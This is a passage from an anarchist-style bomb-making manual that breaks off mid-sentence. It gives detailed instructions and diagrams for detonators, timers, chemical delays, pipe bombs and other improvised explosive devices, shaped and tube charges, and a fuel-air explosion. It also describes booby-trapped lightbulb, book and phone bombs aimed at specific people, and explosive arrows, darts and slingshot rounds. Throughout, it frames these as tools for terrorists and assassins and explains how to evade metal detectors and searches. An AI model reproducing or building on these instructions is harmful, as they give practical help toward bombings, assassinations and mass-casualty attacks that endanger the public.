parachute on the end of the bomb opposite the primer, the bomb, when thrown,
should strike the ground on the primer, and explode. Of course, a bomb with
mercury fulminate in each end will go off on impact regardless of which end it
strikes on, but mercury fulminate is also likely to go off if the person
carrying the bomb is bumped hard.
4.23 ELECT
RICAL IGNITION
Electrical ignition systems for detonation are usually the safest and
most reliable form of ignition. Electrical systems are ideal for demolition
work, if one doesn't have to worry so much about being caught. With two spools
of 500 ft of wire and a car battery, one can detonate explosives from a "safe",
comfortable distance, and be sure that there is nobody around that could get
hurt. With an electrical system, one can control exactly what time a device
will explode, within fractions of a second. Detonation can be aborted in less
than a second's warning, if a person suddenly walks by the detonation sight, or
if a police car chooses to roll by at the time. The two best electrical igniters
are military squibs and model rocketry igniters. Blasting caps for construction
also work well. Model rocketry igniters are sold in packages of six, and cost
about $1.00 per pack. All that need be done to use them is connect it to two
wires and run a current through them. Military squibs are difficult to
get,
but they are a little bit better, since they explode when a current is run
through them, whereas rocketry igniters only burst into flame. Military squibs
can be used to set off sensitive high explosives, such as R.D.X., or potassium
chlorate mixed with petroleum jelly. Igniters can be used to set off black
powder, mercury fulminate, or guncotton, which in turn, can set of a high order
explosive.




4.24 ELECTRO-MECHANICAL IGNITION
Electro-mechanical ignition systems are systems that use some type of
mechanical switch to set off an explosive charge electrically. This type of
switch is typically used in booby traps or other devices in which the person
who places the bomb does not wish to be anywhere near the device when it
explodes. Several types of electro-mechanical detonators will be discussed

4.241 Mercury Switches
Mercury switches are a switch that uses the fact that mercury metal
conducts electricity, as do all metals, but mercury metal is a liquid at
room temperatures. A t
ypical mercury switch is a sealed glass tube with
two electrodes and a bead of mercury metal. It is sealed because of mercury's
nasty habit of giving off brain-damaging vapors. The diagram below may help
to explain a mercury switch.
______________
A / \ B
_____wire +______/___________ \
\ ( Hg ) | /
\ _(_Hg_)__|___/
|
|
wire - |
|
|
When the drop of mercury ("Hg" is mercury's atomic symbol) touches both
contacts, current flows through the switch. If this particular switch was in
its present position, A---B, current would be flowing, since the mercury can
touch both contacts in the horizontal position.
If, however, it was in the | position, the drop of mercury would only
touch the + contact on the A side. Curr
ent, then couldn't flow, since mercury
does not reach both contacts when the switch is in the vertical position.
This type of switch is ideal to place by a door. If it were placed in
the path of a swinging door in the verticle position, the motion of the door
would knock the switch down, if it was held to the ground by a piece if tape.
This would tilt the switch into the verticle position, causing the mercury to
touch both contacts, allowing current to flow through the mercury, and to the
igniter or squib in an explosive device. Imagine opening a door and having it
slammed in your face by an explosion.

4.242 Tripwire Switches
A tripwire is an element of the classic booby trap. By placing a nearly
invisible line of string or fishing line in the probable path of a victim, and
by putting some type of trap there also, nasty things can be caused to occur.
If this mode of thought is applied to explosives, how would one use such a
tripwire to detonate a bomb. The technique is simple. By wrapping
the tips of
a standard clothespin with aluminum foil, and placing something between them,
and connecting wires to each aluminum foil contact, an electric tripwire can
be made, If a piece of wood attached to the tripwire was placed between the
contacts on the clothespin, the clothespin would serve as a switch. When the
tripwire was pulled, the clothespin would snap together, allowing current to
flow between the two pieces of aluminum foil, thereby completing a circuit,
which would have the igniter or squib in it. Current would flow between
the contacts to the igniter or squib, heat the igniter or squib, causing it
it to explode.





__________________________________
\_foil___________________________/
Insert strip of ----------------------------spring
wood with trip- _foil__________________________
wire between foil /_______________________________\
contacts.

Make sure that the aluminum foil contacts do not touch the spring, since
the spring also c
onducts electricity.

4.243 Radio Control Detonators

In the movies, every terrorist or criminal uses a radio controlled
detonator to set off explosives. With a good radio detonator, one can be
several miles away from the device, and still control exactly when it explodes,
in much the same way as an electrical switch. The problem with radio detonators
is that they are rather costly. However, there could possibly be a reason that
a terrorist would wish to spend the amounts of money involved with a RC (radio
control) system and use it as a detonator. If such an individual wanted to
devise an RC detonator, all he would need to do is visit the local hobby store
or toy store, and buy a radio controlled toy. Taking it back to his/her abode,
all that he/she would have to do is detach the solenoid/motor that controls the
motion of the front wheels of a RC car, or detach the solenoid/motor of the
elevators/rudder of a RC plane, or the rudder of a RC boat, and re-connect the
squib or rocket engine ignit
er to the contacts for the solenoid/motor. The
device should be tested several times with squibs or igniters, and fully
charged batteries should be in both he controller and the receiver (the part
that used to move parts before the device became a detonator).

4.3 DELAYS
A delay is a device which causes time to pass from when a device is
set up to the time that it explodes. A regular fuse is a delay, but it would
cost quite a bit to have a 24 hour delay with a fuse. This section deals with
the different types of delays that can be employed by a terrorist who wishes to
be sure that his bomb will go off, but wants to be out of the country when it
does.

4.31 FUSE DELAYS
It is extremely simple to delay explosive devices that employ fuses for
ignition. Perhaps the simplest way to do so is with a cigarette. An average
cigarette burns for about 8 minutes. The higher the "tar" and nicotine rating,
the slower the cigarette burns. Low "tar" and nicotine cigarettes burn quicker
than the highe
r "tar" and nicotine cigarettes, but they are also less likely to
go out if left unattended, i.e. not smoked. Depending on the wind or draft in
a given place, a high "tar" cigarette is better for delaying the ignition of
a fuse, but there must be enough wind or draft to give the cigarette enough
oxygen to burn. People who use cigarettes for the purpose of delaying fuses
will often test the cigarettes that they plan to use in advance to make sure
they stay lit and to see how long it will burn. Once a cigarettes burn rate
is determined, it is a simple matter of carefully putting a hole all the way
through a cigarette with a toothpick at the point desired, and pushing
the fuse for a device in the hole formed.







|=|
|=| ---------- filter
|=|
| |
| |
|o| ---------- hole for fuse
cigarette ------------ | |
| |
| |
| |
| |
| |
| |
| |
| |
|_| ---------- light this end


A similar type of device can be make from powdered charcoal and a sheet
of paper. Simply roll the sheet of paper into a thin tube, and fill it with
powdered charcoal. Punch a hole in it at the desired location, and insert a
fuse. Both ends must be glued closed, and one end of the delay must be doused
with lighter fluid before it is lit. Or, a small charge of gunpowder mixed with
powdered charcoal could conceivably used for igniting such a delay. A chain of
charcoal briquettes can be used as a delay by merely lining up a few bricks
of charcoal so that they touch each other, end on end, and lighting the first
brick. Incense, which can be purchased at almost any novelty or party supply
store, can also be used as a fairly reliab
le delay. By wrapping the fuse
about the end of an incense stick, delays of up to 1/2 an hour are possible.
Finally, it is possible to make a relatively slow-burning fuse in the
home. By dissolving about one teaspoon of black powder in about 1/4 a cup of
boiling water, and, while it is still hot, soaking in it a long piece of all
cotton string, a slow-burning fuse can be made. After the soaked string dries,
it must then be tied to the fuse of an explosive device. Sometimes, the
end of the slow burning fuse that meets the normal fuse has a charge of black
powder or gunpowder at the intersection point to insure ignition, since the
slow-burning fuse does not burn at a very high temperature. A similar type of
slow fuse can be made by taking the above mixture of boiling water and black
powder and pouring it on a long piece of toilet paper. The wet toilet paper
is then gently twisted up so that it resembles a firecracker fuse, and is
allowed to dry.


4.32 TIMER DELAYS

Timer delays, or "time bombs"
are usually employed by an individual who
wishes to threaten a place with a bomb and demand money to reveal its location
and means to disarm it. Such a device could be placed in any populated place
if it were concealed properly. There are several ways to build a timer delay.
By simply using a screw as one contact at the time that detonation is desired,
and using the hour hand of a clock as the other contact, a simple timer can be
made. The minute hand of a clock should be removed, unless a delay of less
than an hour is desired.








___________________________________ to igniter from igniter
| |
| 12 | : :
| 11 1 | : :
| | : :
| 10 2 | : :
| o................|......: :
| | :
| 9 3 | :
| | :
| | :
| 8 4 | :
| o.........|...... :
| 7 5 | : :
| 6 | :.+.....-.....:
|__________________________________| __|_____|
| |
| battery |
o - contacts | |
..... - wire | |
|___________|
This device is set to go off in eleven hours. When the hour hand of the
clock reaches the contact near the numeral 5, it will complete the
circuit,
allowing current to flow through the igniter or squib.
The main disadvantage with this type of timer is that it can only be set
for a maximum time of 12 hours. If an electronic timer is used, such as that in
an electronic clock, then delays of up to 24 hours are possible. By removing
the speaker from an electronic clock, and attaching the wires of a squib or
igniter to them, a timer with a delay of up to 24 hours can be made. To utilize
this type of timer, one must have a socket that the clock can be plugged into.
All that one has to do is set the alarm time of the clock to the desired time,
connect the leads, and go away. This could also be done with an electronic
watch, if a larger battery were used, and the current to the speaker of the
watch was stepped up via a transformer. This would be good, since such a timer
could be extremely small. The timer in a VCR (Video Cassette Recorder) would
be ideal. VCR's can usually be set for times of up to a week. The leads from
the timer to the
recording equipment would be the ones that an igniter or squib
would be connected to. Also, one can buy timers from electronics stores that
would be ideal. Finally, one could employ a digital watch, and use a relay, or
electro-magnetic switch to fire the igniter, and the current of the watch would
not have to be stepped up.

4.33 CHEMICAL DELAYS

Chemical delays are uncommon, but they can be extremely effective in
some cases. If a glass container is filled with concentrated sulfuric acid,
and capped with several thicknesses of aluminum foil, or a cap that it will eat
through, then it can be used as a delay. Sulfuric acid will react with aluminum
foil to produce aluminum sulfate and hydrogen gas, and so the container must be
open to the air on one end so that the pressure of the hydrogen gas that is
forming does not break the container. See diagram on following page.









_ _
| | | |
| | | |
| | | |
| |_____________| |
| | | |
| | sulfuric | |
| | | |
| | acid | |
| | | |---------- aluminum foil
| |_____________| | (several thicknesses)
|_________________|

The aluminum foil is placed over the bottom of the container and secured
there with tape. When the acid eats through the aluminum foil, it can be used
to ignite an explosive device in several ways.
1) Sulfuric acid is a good conductor of electricity. If the acid that
eats through the foil is collected in a glass container placed
underneath the foil, and two wires are placed in the glass container,
a current will be able to flow through the acid when both of the
wires are immersed in the acid.
2) Sulfuric acid reacts very violently with potassium chlorate. If
the acid drips down into a container con
taining potassium chlorate,
the potassium chlorate will burst into flame. This flame can be
used to ignite a fuse, or the potassium chlorate can be the igniter
for a thermit bomb, if some potassium chlorate is mixed in a 50/50
ratio with the thermit, and this mixture is used as an igniter for
the rest of the thermit.
3) Sulfuric acid reacts with potassium permangenate in a similar way.


4.4 EXPLOSIVE CONTAINERS

This section will cover everything from making a simple firecracker to
a complicated scheme for detonating an insensitive high explosive, both of which
are methods that could be utilized by perpetrators of terror.

4.41 PAPER CONTAINERS

Paper was the first container ever used for explosives, since it was
first used by the Chinese to make fireworks. Paper containers are usually very
simple to make, and are certainly the cheapest. There are many possible uses
for paper in containing explosives, and the two most obvious are in firecra
ckers
and rocket engines. Simply by rolling up a long sheet of paper, and gluing it
together, one can make a simple rocket engine. Perhaps a more interesting and
dangerous use is in the firecracker. The firecracker shown here is one of
Mexican design. It is called a "polumna", meaning "dove". The process of their
manufacture is not unlike that of making a paper football. If one takes a sheet
of paper about 16 inches in length by 1.5 inches wide, and fold one corner so
that it looks like this:





________________________________________________________
| |\
| | \
| | \
|______________________________________________________|___\
and then fold it again so that it looks like this:
_______________________________________________________
| /|
| / |
| / |
|__________________________________________________/___|
A pocket is formed. This pocket can be filled with black powder, pyrodex,
flash powder, gunpowder,rocket engine powder, or any of the quick-burning fuel-
oxodizer mixtures that occur in the form of a fine powder. A fuse is then
inserted, and one continues the triangular folds, being careful not to spill
out any of the explosive. When the polumna is finished, it should be taped
together very tightly, since this will increase the strength of the container,
and produce a louder and more powerful explosion when it is lit. The finished
polumna should look like a 1/4 inch - 1/3 inch thick triangle, like the one
shown below:

^
/ \ ----- securely tape all corners
/ \
/ \
/ \
/ \
/ \____________________________
/__
___________\__/__/__/__/__/__/__/__/__/ ---------- fuse



4.42 METAL CONTAINERS

The classic pipe bomb is the best known example of a metal-contained
explosive. Idiot anarchists take white tipped matches and cut off the match
heads. They pound one end of a pipe closed with a hammer, pour in the white-
tipped matches, and then pound the other end closed. This process often kills
the fool, since when he pounds the pipe closed, he could very easily cause
enough friction between the match heads to cause them to ignite and explode the
unfinished bomb. By using pipe caps, the process is somewhat safer, and the
less stupid anarchist would never use white tipped matches in a bomb. He would
buy two pipe caps and threaded pipe (fig. 1). First, he would drill a hole in
one pipe cap, and put a fuse in it so that it will not come out, and so powder
will not escape during handling. The fuse would be at least 3/4 an inch long
inside the bomb. He would then screw the cap with the fuse in it on tightly,
p
ossibly putting a drop of super glue on it to hold it tight. He would then
pour his explosive powder in the bomb. To pack it tightly, he would take a
large wad of tissue paper and, after filling the pipe to the very top, pack the
powder down, by using the paper as a ramrod tip, and pushing it with a pencil
or other wide ended object, until it would not move any further. Finally, he
would screw the other pipe cap on, and glue it. The tissue paper would help
prevent some of the powder from being caught in the threads of the pipe or pipe
cap from being crushed and subject to friction, which might ignite the powder,
causing an explosion during manufacture. An assembled bomb is shown in fig. 2.





_________ _______________ __________
| | ^^^^^^ ^^^^^^ | |
| |vvvvv| |_________________________| |vvvvvv| |
| | | |
| | | |
| |
| |
| | | |
| | ___________________________ | |
| | | | | |
| |^^^^^| vvvvvv_______________vvvvvv |^^^^^^| |
|_______| |________|
fig 1. Threaded pipe and endcaps.


________ ________
| _____|________________________________|_____ |
| |__________________________________________| |
| |: : : : |- - - - - - - - - - - - - - - - -| |
| | tissue | - - - - - - - - - - - - - - - - |_|
| | : : : |- - - low order explosive - - ----------------------
| | paper | - - - - - - - - - - - - - - - - |-| fuse
| |: : : : |- - - - - - - - - - - - - - - - -| |
| |________|_________________________________| |
| |__________________________________________| |
|_
_____| |______|
endcap pipe endcap
w/ hole
fig. 2 Assembled pipe bomb.

This is one possible design that a mad bomber would use. If, however,
he did not have access to threaded pipe with endcaps, he could always use a
piece of copper or aluminum pipe, since it is easily bent into a suitable
position. A major problem with copper piping, however, is bending and folding
it without tearing it; if too much force is used when folding and bending copper
pipe, it will split along the fold. The safest method for making a pipe bomb
out of copper or aluminum pipe is similar to the method with pipe and endcaps.
First, one flattens one end of a copper or aluminum pipe carefully, making sure
not to tear or rip the piping. Then, the flat end of the pipe should be folded
over at least once, if this does not rip the pipe. A fuse hole should be
drilled in the pipe near the now closed end,
and the fuse should be inserted.
Next, the bomb-builder would fill the bomb with a low order explosive, and pack
it with a large wad of tissue paper. He would then flatten and fold the other
end of the pipe with a pair of pliers. If he was not too dumb, he would do this
slowly, since the process of folding and bending metal gives off heat, which
could set off the explosive. A diagram is presented below:
________
_______________________________________________/ |
| |
| o |
|______________________________________________ |
\_______|
fig. 1 pipe with one end flattened and fuse hole drilled (top view)






______
____________________________________________/ | |
|
| |
| o | |
|___________________________________________ | |
\__|__|
fig. 2 pipe with one end flattened and folded up (top view)
____________ fuse hole
|
v
_________________________________________________
| \ |____ |
| \____| |
| ______|
| /
|_____________________________/__________________
fig. 3 pipe with flattened and folded end (side view)
_________________ fuse
/
|
________ ______________________________|___ _______
| ____| / |- - - - - - - - - - -| - - \ |___ |
| |_____/ti
ssue| - - - - - - - - - - - -|- - \_____| |
|________ paper |- - - low order explosive - _______|
\ | - - - - - - - - - - - - - - /
\_____________________________________/

fig. 4 completed bomb, showing tissue paper packing and explosive
(side view)



A CO2 cartridge from a B.B gun is another excellent container for
a low-order explosive. It has one minor disadvantage: it is time consuming
to fill. But this can be rectified by widening the opening of the cartridge
with a pointed tool. Then, all that would have to be done is to fill the
CO2 cartridge with any low-order explosive, or any of the fast burning fuel-
oxodizer mixtures, and insert a fuse. These devices are commonly called
"crater makers".
A CO2 cartridge also works well as a container for a thermit incendiary
device, but it must be modified. The opening in the end must be widened, so
that the ignition mixture, such as powdered magnesium, does not explode. The
fuse wil
l ignite the powdered magnesium, which, in turn, would ignite the
thermit.
The previously mentioned designs for explosive devices are fine for
low-order explosives, but are unsuitable for high-order explosives, since the
latter requires a shockwave to be detonated. A design employing a smaller
low-order explosive device inside a larger device containing a high-order
explosive would probably be used. It would look something like:








_______________________ fuse
|
|
|
_________ | _________
| ____|__________________________|___________|____ |
| | * * * * * * * * * * * * * * *|* * * * * * * | |
| | * * * * * * high explosive | * * * * * * * | |
| | * * * * * * * * * * * * * * *|* * * * * * * | |
| | * ______ _______________|_ ______ * | |
| | * * | __| / - - - - - - | \ |__ | * | |
| | * | |____/ low explosive - \____| | * | |
| | * * |_______ - - - - - - - - - _______| * | |
| | * * * * * \ - - - - - - - - / * * * * * | |
| | * * * * * * \_________________/ * * * * * | |
| | * * * * * * * * * * * * * * * * * * * * * * | |
| | * * * * * * * * * * * * * * * * * * * * * * | |
| | * * * * * * * * * * * * * * * * * * * * * * | |
| |______________________________________________| |
|_______| |_______|

If the large high explosive container is small, such as a CO2 cartridge,
then a segment of a hollow radio antenna can be made into a low-order pipe bomb,
which can be fitted with a fuse, and inserted into the CO2 cartridge.
4.43 GLASS CONTAINERS

Glass containers can be suitable for low-order explosives, but there
are problems with them. First, a glass container can be bro
ken relatively
easily compared to metal or plastic containers. Secondly, in the
not-too-unlikely event of an "accident", the person making the device would
probably be seriously injured, even if the device was small. A bomb made out of
a sample perfume bottle-sized container exploded in the hands of one boy, and he
still has pieces of glass in his hand. He is also missing the final segment of
his ring finger, which was cut off by a sharp piece of flying glass...
Nonetheless, glass containers such as perfume bottles can be used by
a demented individual, since such a device would not be detected by metal
detectors in an airport or other public place. All that need be done is fill
the container, and drill a hole in the plastic cap that the fuse fits tightly
in, and screw the cap-fuse assembly on.

________________________ fuse
|
|
|
_____|_____
| ___|___ |
| > | < | drill ho
le in cap, and insert fuse;
| > | < | be sure fuse will not come out of cap
| > | < |
| | |
| |
| |
| | screw cap on bottle
| |
| |
V V




_________
< >
< >
< >
/ \
/ \
/ \
| | fill bottle with low-order explosive
| |
| |
| |
| |
|___________|

Large explosive devices made from glass containers are not practicle,
since glass is not an exceptionally strong container. Much of the explosive
that is used to fill the container is wasted if the container is much larger
than a 16 oz. soda bottle. Also, glass containers ar
e usually unsuitable for
high explosive devices, since a glass container would probably not withstand
the explosion of the initiator; it would shatter before the high explosive was
able to detonate.


4.44 PLASTIC CONTAINERS

Plastic containers are perhaps the best containers for explosives, since
they can be any size or shape, and are not fragile like glass. Plastic piping
can be bought at hardware or plumbing stores, and a device much like the ones
used for metal containers can be made. The high-order version works well with
plastic piping. If the entire device is made out of plastic, it is not
detectable by metal detectors. Plastic containers can usually be shaped by
heating the container, and bending it at the appropriate place. They can be
glued closed with epoxy or other cement for plastics. Epoxy alone can be used
as an endcap, if a wad of tissue paper is placed in the piping. Epoxy with a
drying agent works best in this type of device.



























||
||
|| ||
||\_____________/||
|| ||
|| epoxy ||
||_______________||
|| ||
|| tissue ||
|| paper ||
||_______________||
||***************||
||***************||
||***************||
||***************||
||** explosive **||
||***************||
||***********----------------------- fuse
||***************||
||ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ||
|| ||
|| tissue ||
|| paper ||
||_______________||
|| ||
|| epoxy ||
|| _____________ ||
||/ \||
|| ||
|| ||

One en
d must be made first, and be allowed to dry completely before the
device can be filled with powder and fused. Then, with another piece of tissue
paper, pack the powder tightly, and cover it with plenty of epoxy. PVC pipe
works well for this type of device, but it cannot be used if the pipe had an
inside diameter greater than 3/4 of an inch. Other plastic puttys can be used
int this type of device, but epoxy with a drying agent works best.



4.5 ADVANCED USES FOR EXPLOSIVES

The techniques presented here are those that could be used by a person
who had some degree of knowledge of the use of explosives. Some of this
information comes from demolitions books, or from military handbooks. Advanced
uses for explosives usually involved shaped charges, or utilize a minimum amount
of explosive to do a maximum amount of damage. They almost always involve high-
order explosives.

4.51 SHAPED CHARGES

A shaped charge is an explosive device that, upon detonation, directs
the explosive force of
detonation at a small target area. This process can be
used to breach the strongest armor, since forces of literally millions of pounds
of pressure per square inch can be generated. Shaped charges employ high-order
explosives, and usually electric ignition systems. KEEP IN MIND THAT ALL
EXPLOSIVES ARE DANGEROUS, AND SHOULD NEVER BE MADE OR USED!!




An example of a shaped charge is shown below.

+ wire ________ _______ - wire
| |
| |
| |
_ _________|_________|____________
^ | ________|_________|__________ |
| | | | | | |
| | | \ igniter / | |
| | | \_______/ | |
| | | priming charge | |
| | | (mercury fulminate) | |
| | | ^ | |
| | | / \ | |
| | | / \ | |
| | | / \ | |
| | | / \ | |
| | | / \ | |
| | | / \ | |
| | / \ | |
8 inches high | | / \ | |
| | / high \ | |
| | | / explosive \ | |
| | | / charge \ | |
| | | / \ | |
| | |/ \| |
| | | ^ | |
| | | / \ | |
| | | / \ | |
| | | / \ | |
| | | / \ | |
| | | / \ | |
| | | / \ | |
| | | / \ | |
| | | / \ | |
| | | / \ | | ------- 1/2 inch
| | | / \ | | thick steel
| | | / \ | | pipe
| | | / \ | |
| | |/ \| |
| hole for | | | | hole for
| screw | | | | screw
| | | | |
V_______ ___________| | | |___________ ________
|______| |____________| |_____________| |______|
|<------- 8 inches -------->|
If
a device such as this is screwed to a safe, for example, it would
direct most of the explosive force at a point about 1 inch away from the opening
of the pipe. The basis for shaped charges is a cone-shaped opening in the
explosive material. This cone should have an angle of 45 degrees. A device
such as this one could also be attached to a metal surface with a powerful
electromagnet.









4.52 TUBE EXPLOSIVES

A variation on shaped charges, tube explosives can be used in ways that
shaped charges cannot. If a piece of 1/2 inch plastic tubing was filled with
a sensitive high explosive like R.D.X., and prepared as the plastic explosive
container in section 4.44, a different sort of shaped charge could be produced;
a charge that directs explosive force in a circular manner. This type of
explosive could be wrapped around a column, or a doorknob, or a telephone pole.
The explosion would be directed in and out, and most likely destroy whatever
it was wrapped around. In an unbent state, a tube explosi
ve would look like
this:























































|| ||
|| ||
||\____/||
|| epoxy||
||______||
|| ||
||tissue||
|| paper||
||______||
||******||
||******||
||******||
||******||
||******||
||******||
||******||
||******||
||******||
||******||
||******||
||******||
||******||
||******||
|| RDX ||
||******||
||******||
||******||
||******||
||******||
||******||
||******||
||******||
||******||
||******||
||******||
||******||
||******||
||******||
|| ____ ||
|| | s| ||
|| | q| ||
|| | u| ||
|| | i| ||
|| | b| ||
|| | b| ||
|| |__| ||
||__||__||
||tissue||
|| paper||
||__||__||
|| || ||
|| epoxy||
|| || ||
|| _||_ ||
||/ || \||
|| || ||
|| || ||
||_______ + wire ______________
|
|________ - wire ______________





When an assassin or terrorist wishes to use a tube bomb, he must wrap
it around whatever thing he wishes to destroy, and epoxy the ends of the tube
bomb together. After it dries, he/she can connect wires to the squib wires,
and detonate the bomb, with any method of electric detonation.


4.53 ATOMIZED PARTICLE EXPLOSIONS

If a highly fla
mmable substance is atomized, or, divided into very small
particles, and large amounts of it is burned in a confined area, an explosion
similar to that occurring in the cylinder of an automobile is produced. The
tiny droplets of gasoline burn in the air, and the hot gasses expand rapidly,
pushing the cylinder up. Similarly, if a gallon of gasoline was atomized and
ignited in a building, it is very possible that the expanding gassed would push
the walls of the building down. This phenomenon is called an atomized particle
explosion. If a person can effectively atomize a large amount of a highly
flammable substance and ignite it, he could bring down a large building, bridge,
or other structure. Atomizing a large amount of gasoline, for example, can be
extremely difficult, unless one has the aid of a high explosive. If a gallon
jug of gasoline was placed directly over a high explosive charge, and the charge
was detonated, the gasoline would instantly be atomized and ignited. If this
occurred in a building, for ex
ample, an atomized particle explosion would surely
occur. Only a small amount of high explosive would be necessary to accomplish
this feat, about 1/2 a pound of T.N.T. or 1/4 a pound of R.D.X. Also, instead
of gasoline, powdered aluminum could be used. It is necessary that a high
explosive be used to atomize a flammable material, since a low-order explosion
does not occur quickly enough to atomize or ignite the flammable material.



4.54 LIGHTBULB BOMBS


An automatic reaction to walking into a dark room is to turn on the
light. This can be fatal, if a lightbulb bomb has been placed in the overhead
light socket. A lightbulb bomb is surprisingly easy to make. It also comes
with its own initiator and electric ignition system. On some lightbulbs, the
lightbulb glass can be removed from the metal base by heating the base of a
lightbulb in a gas flame, such as that of a blowtorch or gas stove. This must
be done carefully, since the inside of a lightbulb is a vacuum. When the glue
gets hot enough
, the glass bulb can be pulled off the metal base. On other
bulbs, it is necessary to heat the glass directly with a blowtorch or
oxy-acetylene torch. When the bulb is red hot, a hole must be carefully poked
in the bulb, remembering the vacuum state inside the bulb. In either case,
once the bulb and/or base has cooled down to room temperature or lower, the
bulb can be filled with an explosive material, such as black powder. If the
glass was removed from the metal base, it must be glued back on to the base
with epoxy. If a hole was put in the bulb, a piece of duct tape is sufficient
to hold the explosive in the in the bulb. Then, after making sure that the
socket has no power by checking with a working lightbulb, all that need be
done is to screw the lightbulb bomb into the socket. Such a device has been
used by terrorists or assassins with much success, since nobody can search the
room for a bomb without first turning on the light.








4.55 BOOK BOMBS

Concealing a bomb can be extremely
difficult in a day and age where
perpetrators of violence run wild. Bags and briefcases are often searched
by authorities whenever one enters a place where an individual might intend
to set off a bomb. One approach to disguising a bomb is to build what is
called a book bomb; an explosive device that is entirely contained inside of
a book. Usually, a relatively large book is required, and the book must be of
the hardback variety to hide any protrusions of a bomb. Dictionaries, law
books, large textbooks, and other such books work well. When an individual
makes a bookbomb, he/she must choose a type of book that is appropriate for
the place where the book bomb will be placed. The actual construction of a
book bomb can be done by anyone who possesses an electric drill and a coping
saw. First, all of the pages of the book must be glued together. By pouring
an entire container of water-soluble glue into a large bucket, and filling
the bucket with boiling water, a glue-water solution can be made that will
ho
ld all of the book's pages together tightly. After the glue-water solution
has cooled to a bearable temperature, and the solution has been stirred well,
the pages of the book must be immersed in the glue-water solution, and each
page must be thoroughly soaked. It is extremely important that the covers of
the book do not get stuck to the pages of the book while the pages are drying.
Suspending the book by both covers and clamping the pages together in a vice
works best. When the pages dry, after about three days to a week, a hole must
be drilled into the now rigid pages, and they should drill out much like wood.
Then, by inserting the coping saw blade through the pages and sawing out a
rectangle from the middle of the book, the individual will be left with a shell
of the book's pages. The pages, when drilled out, should look like this:

________________________
| ____________________ |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| |__________________| |
|______________________|
(book covers omitted)

This rectangle must be securely glued to the back cover of the book.
After building his/her bomb, which usually is of the timer or radio controlled
variety, the bomber places it inside the book. The bomb itself, and whatever
timer or detonator is used, should be packed in foam to prevent it from rolling
or shifting about. Finally, after the timer is set, or the radio control has
been turned on, the front cover is glued closed, and the bomb is taken to its
destination.









4.56 PHONE BOMBS

The phone bomb is an explosive devi
ce that has been used in the past
to kill or injure a specific individual. The basic idea is simple: when the
person answers the phone, the bomb explodes. If a small but powerful high
explosive device with a squib was placed in the phone receiver, when the
current flowed through the receiver, the squib would explode, detonating the
high explosive in the person's hand. Nasty. All that has to be done is
acquire a squib, and tape the receiver switch down. Unscrew the mouthpiece
cover, and remove the speaker, and connect the squib's leads where it was.
Place a high explosive putty, such as C-1 (see section 3.31) in the receiver,
and screw the cover on, making sure that the squib is surrounded by the C-1.
Hang the phone up, and leave the tape in place. When the individual to whom
the phone belongs attempts to answer the phone, he will notice the tape, and
remove it. This will allow current to flow through the squib. Note that
the device will not explode by merely making a phone call; the owner of the
phone
must lift up the receiver, and remove the tape. It is highly probable
that the phone will be by his/her ear when the device explodes...

5.0 SPECIAL AMMUNITION FOR PROJECTILE WEAPONS

Explosive and/or poisoned ammunition is an important part of a social
deviant's arsenal. Such ammunition gives the user a distinct advantage over
individual who use normal ammunition, since a grazing hit is good enough to
kill. Special ammunition can be made for many types of weapons, from crossbows
to shotguns.

5.1 SPECIAL AMMUNITION FOR PRIMITIVE WEAPONS

For the purposes of this publication, we will call any weapon primitive
that does not employ burning gunpowder to propel a projectile forward. This
means blowguns, bows and crossbows, and wristrockets.


5.11 BOW AND CROSSBOW AMMUNITION

Bows and crossbows both fire arrows or bolts as ammunition. It is
extremely simple to poison an arrow or bolt, but it is a more difficult matter
to produce explosive arrows or bolts. If, however, one ca
n acquire aluminum
piping that is the same diameter of an arrow or crossbow bolt, the entire
segment of piping can be converted into an explosive device that detonates
upon impact, or with a fuse. All that need be done is find an aluminum tube
of the right length and diameter, and plug the back end with tissue paper and
epoxy. Fill the tube with any type of low-order explosive or sensitive high-
order explosive up to about 1/2 an inch from the top. Cut a slot in the piece
of tubing, and carefully squeeze the top of the tube into a round point, making
sure to leave a small hole. Place a no. 11 percussion cap over the hole, and
secure it with super glue. Finally, wrap the end of the device with electrical
or duct tape, and make fins out of tape. Or, fins can be bought at a sporting
goods store, and glued to the shaft. The finished product should look like:








_____
| | ---------- no. 11 percussion cap
||*||
|*|
|*|
|*|
|*|
|*|
|*| ----------- aluminum piping
|*|
|e|
|x|
|p|
|l|
|o|
|s|
|i|
|v|
|e|
|*|
|*|
|*|
|*|
|*|
|*|
|*|
/|_|\
/ |t| \
| |p| |
| |_| |
| |e| | -------- fins
| |p| |
| |y| |
|_|_|_|
|_|

tp: tissue paper
epy: epoxy
When the arrow or bolt strikes a hard surface, the percussion cap
explodes, igniting or detonating the explosive.

5.12 SPECIAL AMMUNITION FOR BLOWGUNS

The blowgun is an interesting weapon which has several advantages.
A blowgun can be extremely accurate, concealable, and deliver an explosive
or poisoned project
ile. The manufacture of an explosive dart or projectile
is not difficult. Perhaps the most simple design for such involves the use
of a pill capsule, such as the kind that are taken for headaches or allergies.
Such a capsule could easily be opened, and the medicine removed. Next, the
capsule would be re-filled with an impact-sensitive explosive. An additional
high explosive charge could be placed behind the impact-sensitive explosive,
if one of the larger capsules were used. Finally, the explosive capsule would
be reglued back together, and a tassel or cotton would be glued to the end
containing the high explosive, to insure that the impact-detonating explosive
struck the target first. Such a device would probably be about 3/4 of an inch
long, not including the tassel or cotton, and look something like this:




____________________
/mercury | \-----------------------
(fulminate| R.D.X. )---------------------- } tassels
\____
____|___________/-----------------------



5.13 SPECIAL AMMUNITION FOR WRISTROCKETS AND SLINGSHOTS

A modern wristrocket is a formidable weapon. It can throw a shooter
marble about 500 ft. with reasonable accuracy. Inside of 200 ft., it could well
be lethal to a man or animal, if it struck in a vital area. Because of the
relatively large sized projectile that can be used in a wristrocket, the
wristrocket can be adapted to throw relatively powerful explosive projectiles.
A small segment of aluminum pipe could be made into an impact-detonating device
by filling it with an impact-sensitive explosive material. Also, such a pipe
could be filled with a low-order explosive, and fitted with a fuse, which would
be lit before the device was shot. One would have to make sure that the fuse
was of sufficient length to insure that the device did not explode before it
reached its intended target. Finally, .22 caliber caps, such as the kind that
are used in .22 caliber blank guns, make excellent exploding a
mmunition for
wristrockets, but they must be used at a relatively close range, because of
their light weight.



5.2 SPECIAL AMMUNITION FOR FIREARMS

When special ammunition is used in combination with the power and
rapidity of modern firearms, it becomes very easy to take on a small army with
a single weapon. It is possible to buy explosive ammunition, but that can be
difficult to do. Such ammunition can also be manufactured in the home. There
is, however, a risk involved with modifying any ammunition. If the ammunition
